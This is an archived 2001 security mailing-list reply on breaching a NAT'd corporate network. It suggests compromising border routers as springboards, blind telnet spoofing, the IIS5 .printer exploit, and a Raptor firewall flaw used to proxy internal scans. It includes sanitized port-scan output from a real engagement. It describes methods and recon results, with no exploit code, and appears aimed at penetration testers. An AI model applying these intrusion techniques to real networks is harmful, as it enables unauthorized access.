> One would conlude that one of these is being used for NAT for > internal.company.com - but where do I go from here. ...using this information, strategies I would suggest would include: - compromising the cisco or the wellfleet and, if they provide common utilities (telnet, tftp, ftp etc) using them as a springboard into the RFC1918-addressed portion of the target's network. Of course, if they aren't answering to internet-sourced connection requests you're out of luck. If you knew that they accepted telnet connections from, say, 192.168.1.1 then you could try a blind spoofing attack on telnet... - compromising a non-RFC1918-addressed host on the target's network and exploring to see if routing is configured to allow /this/ to be a springboard. I would currently suggest a UNIX box or a Win2K/IIS5 SP0/SP1 host (vulnerable to the ISAPI .printer exploit) as being valuable target hosts. if the network is protected by a Raptor firewall v6.5 unpatched, you could try http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D2517 and using the outside interface of the firewall as a proxy, scan the internal RFC-1918 hosts behind it. as an example, one time i found a www server at address 255.255.255.130 (IP addresses changed to protect the innocent - domain name changed to customer.com) that when banner-grabbed replied with: + 255.255.255.130 |___ 80 World Wide Web HTTP |___ HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Content-Location: http://10.0.0.6/index.htm.. after that, i scanned the rest of the network and found: * - 255.255.255.127 * - 255.255.255.128 * + 255.255.255.129 |___ 7 Echo |___ 2001 Cisco router management |___ ............ |___ 9001 Cisco xremote |___ ............ - 255.255.255.125 - 255.255.255.126 + 255.255.255.130 |___ 80 World Wide Web HTTP |___ HTTP/1.1 200 OK..Server: Microsoft-IIS/5.0..Content-Location: http://10.0.0.6/index.htm.. - 255.255.255.131 + 255.255.255.132 |___ 21 File Transfer Protocol [Control] |___ 500 proxy access denied.. |___ 22 SSH Remote Login Protocol |___ 25 Simple Mail Transfer |___ 220 cusfw01 NT smtp-gw is ready... |___ 53 Domain Name Server |___ 80 World Wide Web HTTP |___ HTTP/1.0 404 Error..Content-type: text/html....<h1>Error - 404</h1><HR><PRE>Cannot resolve destination<br></PRE><br><HR>Http Proxy</br> |___ 110 Post Office Protocol - Version 3 |___ +OK customer.com POP MDaemon 3.5.3 ready <MDAEMON-XXXXXXXXXXXXX.XXXXXXXXXXXXXXat_private>.. the .129 is their border router. the Raptor is sitting at .132. the web server is NATTED at .130 and MS is happy telling us the internal addressing scheme. after that, it was easy to scan the internal net using the raptor as a proxy and we found out some interesting servers at the other side of the fw . . . . ;) hope this helps! ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
This archive was generated by hypermail 2b30 : Thu May 24 2001 - 07:15:25 PDT